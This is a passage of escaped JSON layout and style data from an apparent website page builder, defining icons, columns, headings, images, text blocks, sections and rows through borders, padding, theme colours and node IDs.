79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c111\"]},{\"id\":761,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c116\"]},{\"id\":765,\"type\":\"hop-heading\",\"nodeId\":\"182-c304\",\"nodes\":[\"182-c304\"],\"v\":\"1.1\",\"style\":{\"media\":{\"mobile\":[],\"tablet\":[]}}},{\"id\":766,\"type\":\"hop-column\",\"nodeId\":\"182-c305\",\"nodes\":[\"182-c154\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":767,\"type\":\"hop-image\",\"nodeId\":\"182-c306\",\"nodes\":[\"182-c155\"],\"v\":\"1.1\"},{\"id\":768,\"type\":\"hop-heading\",\"nodeId\":\"182-c307\",\"nodes\":[\"182-c156\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":770,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c158\"]},{\"id\":771,\"type\":\"hop-text\",\"nodeId\":\"182-c309\",\"nodes\":[\"182-c157\"],\"v\":\"1.1\"},{\"id\":772,\"type\":\"hop-column\",\"nodeId\":\"182-c310\",\"nodes\":[\"182-c173\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":773,\"type\":\"hop-column\",\"nodeId\":\"182-c311\",\"nodes\":[\"182-c178\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":774,\"type\":\"hop-column\",\"nodeId\":\"182-c312\",\"nodes\":[\"182-c183\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":775,\"type\":\"hop-column\",\"nodeId\":\"182-c313\",\"nodes\":[\"182-c187\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"v\":\"1.1\"},{\"id\":776,\"type\":\"hop-image\",\"nodeId\":\"182-c314\",\"nodes\":[\"182-c174\"],\"v\":\"1.1\"},{\"id\":777,\"type\":\"hop-heading\",\"nodeId\":\"182-c315\",\"nodes\":[\"182-c175\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":778,\"type\":\"hop-text\",\"nodeId\":\"182-c316\",\"nodes\":[\"182-c176\"],\"v\":\"1.1\"},{\"id\":780,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c177\"]},{\"id\":781,\"type\":\"hop-image\",\"nodeId\":\"182-c318\",\"nodes\":[\"182-c179\"],\"v\":\"1.1\"},{\"id\":782,\"type\":\"hop-heading\",\"nodeId\":\"182-c319\",\"nodes\":[\"182-c180\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":783,\"type\":\"hop-text\",\"nodeId\":\"182-c320\",\"nodes\":[\"182-c181\"],\"v\":\"1.1\"},{\"id\":785,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c182\"]},{\"id\":786,\"type\":\"hop-image\",\"nodeId\":\"182-c322\",\"nodes\":[\"182-c184\"],\"v\":\"1.1\"},{\"id\":787,\"type\":\"hop-heading\",\"nodeId\":\"182-c323\",\"nodes\":[\"182-c185\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":788,\"type\":\"hop-text\",\"nodeId\":\"182-c324\",\"nodes\":[\"182-c186\"],\"v\":\"1.1\"},{\"id\":791,\"type\":\"hop-image\",\"nodeId\":\"182-c326\",\"nodes\":[\"182-c188\"],\"v\":\"1.1\"},{\"id\":792,\"type\":\"hop-heading\",\"nodeId\":\"182-c327\",\"nodes\":[\"182-c189\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":793,\"type\":\"hop-text\",\"nodeId\":\"182-c328\",\"nodes\":[\"182-c190\"],\"v\":\"1.1\"},{\"id\":795,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c191\"]},{\"id\":796,\"type\":\"hop-column\",\"nodeId\":\"182-c330\",\"nodes\":[\"182-c192\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":797,\"type\":\"hop-column\",\"nodeId\":\"182-c331\",\"nodes\":[\"182-c197\"],\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"right\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"},\"left\":{\"style\":\"solid\",\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(224, 225, 225)\"}}},\"v\":\"1.1\"},{\"id\":798,\"type\":\"hop-image\",\"nodeId\":\"182-c332\",\"nodes\":[\"182-c193\"],\"v\":\"1.1\"},{\"id\":799,\"type\":\"hop-heading\",\"nodeId\":\"182-c333\",\"nodes\":[\"182-c194\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":800,\"type\":\"hop-text\",\"nodeId\":\"182-c334\",\"nodes\":[\"182-c195\"],\"v\":\"1.1\"},{\"id\":802,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c196\"]},{\"id\":803,\"type\":\"hop-image\",\"nodeId\":\"182-c336\",\"nodes\":[\"182-c198\"],\"v\":\"1.1\"},{\"id\":804,\"type\":\"hop-heading\",\"nodeId\":\"182-c337\",\"nodes\":[\"182-c199\"],\"v\":\"1.1\",\"props\":{\"headerType\":\"4\"}},{\"id\":805,\"type\":\"hop-text\",\"nodeId\":\"182-c338\",\"nodes\":[\"182-c200\"],\"v\":\"1.1\"},{\"id\":807,\"style\":{\"descendants\":{\"inner\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"},\"left\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"right\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"color\":\"${theme.colors.1}\"},\"bottom\":{\"style\":\"solid\",\"width\":{\"path\":\"value\",\"value\":2},\"radius\":{\"right\":{\"path\":\"value\",\"value\":176},\"left\":{\"path\":\"value\",\"value\":176}},\"color\":\"${theme.colors.1}\"}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":25},\"left\":{\"path\":\"value\",\"value\":25},\"right\":{\"path\":\"value\",\"value\":25},\"bottom\":{\"path\":\"value\",\"value\":25}},\"width\":{\"path\":\"value\",\"value\":\"100\"},\"fill\":\"${theme.colors.0}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.3}\"}},\"transform\":{\"rotate\":{\"2d\":{\"path\":\"value\",\"value\":118}}}},\"icon\":{\"fill\":\"${theme.colors.3}\",\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(45, 45, 134, 0)\"},\"fill\":\"${theme.colors.0|mediumLowLuminosity}\"}},\"border\":{\"top\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"right\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"bottom\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"},\"left\":{\"width\":{\"value\":\"1\",\"unit\":\"px\"},\"color\":\"rgb(125, 79, 79)\"}},\"width\":{\"path\":\"value\",\"value\":\"20\"},\"height\":{\"path\":\"value\",\"value\":\"20\"}}}},\"scope\":\"local\",\"type\":\"hop-icon\",\"v\":\"1.1\",\"nodes\":[\"182-c201\"]},{\"id\":808,\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"color\":\"rgba(0, 0, 0, 0.1)\",\"blur\":\"3\",\"y\":\"1\",\"spread\":\"1\"}]},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}},\"background\":{\"color\":\"${theme.colors.4}\"},\"border\":{\"top\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"right\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"bottom\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}},\"left\":{\"style\":\"solid\",\"color\":\"rgb(224, 225, 225)\",\"width\":{\"value\":\"1\",\"unit\":\"px\"}}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c147\"],\"nodeId\":\"182-c147\"},{\"id\":828,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c149\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":829,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c150\"]},{\"id\":830,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c151\"]},{\"id\":831,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c152\"]},{\"id\":832,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c153\"]},{\"id\":833,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c154\"]},{\"id\":835,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon\":{\"margin\":{\"right\":{\"value\":\"5\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}},\"icon-content\":{\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"},\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.0}\"}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c155\"]},{\"id\":842,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c156\"]},{\"id\":843,\"type\":\"hop-column\",\"v\":\"1.1\",\"nodes\":[\"182-c157\"]},{\"id\":844,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"182-c158\"]},{\"id\":846,\"type\":\"hop-section\",\"props\":{\"showHeader\":true},\"v\":\"1.1\",\"nodes\":[\"182-c73\"],\"style\":{\"background\":{\"color\":\"#F5FAFD\"}}},{\"id\":847,\"props\":{\"layout\":{\"equalWidth\":true,\"itemsPerRow\":4},\"media\":{\"tablet\":{\"layout\":{\"itemsPerRow\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"182-c74\"]},{\"id\":848,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"path\":\"value\",\"value\":\"10\"},\"verticalInnerGap\":0,\"horizontalInnerGap\":0}},\"v\":\"1.1\",\"nodes\":[\"182-c75\",\"182-c81\",\"182-c87\",\"182-c93\",\"182-c99\",\"182-c105\",\"182-c110\",\"182-c116\",\"182-c122\",\"182-c128\",\"182-c140\",\"182-c134\",\"182-c228\",\"182-c234\"]},{\"id\":849,\"type\":\"hop-image\",\"style\":{\"descendants\":{\"image\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}},\"overlay\":{\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"300\",\"unit\":\"px\"},\"right\":{\"value\":\"300\",\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"182-c82\"]},{\"id\":850,\"type\":\"hop-heading\",\"props\":{\"headerType\":\"4\"},\"v\":\"1.1\",\"nodes\":[\"182-c77\",\"182-c83\",\"182-c89\",\"182-c95\",\"182-c101\",\"182-c107\",\"182-c112\",\"182-c118\",\"182-c124\",\"182-c130\",\"182-c142\",\"182-c136\",\"182-c230\",\"182-c236\"]},{\"id\":851,\"type\":\"hop-text\",\"style\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}},\"media\":{\"desktop\":{\"typography\":{\"holders\":{\"p\":{\"style\":\"italic\"}}}}}},